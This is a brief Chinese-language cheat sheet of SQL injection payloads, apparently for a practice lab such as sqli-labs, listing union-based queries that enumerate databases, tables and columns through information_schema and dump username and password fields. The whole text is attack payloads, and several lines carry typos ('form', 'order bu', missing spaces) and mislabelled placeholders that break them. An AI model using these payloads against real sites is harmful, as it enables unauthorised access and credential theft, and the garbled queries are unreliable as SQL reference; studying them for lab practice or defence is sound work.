查库:select group_concat(schema_name) form information_schema.schemata
group_concat()---避免列举
查表:select table_name form information_schema.tableswhere table_schema=‘表名’
查列:select column_name form information_schema.columnswhere table_name='列名'
查字段:select username,password,id from security.表名
判断几列:order bu n;
回显:unionselect1,2,3--+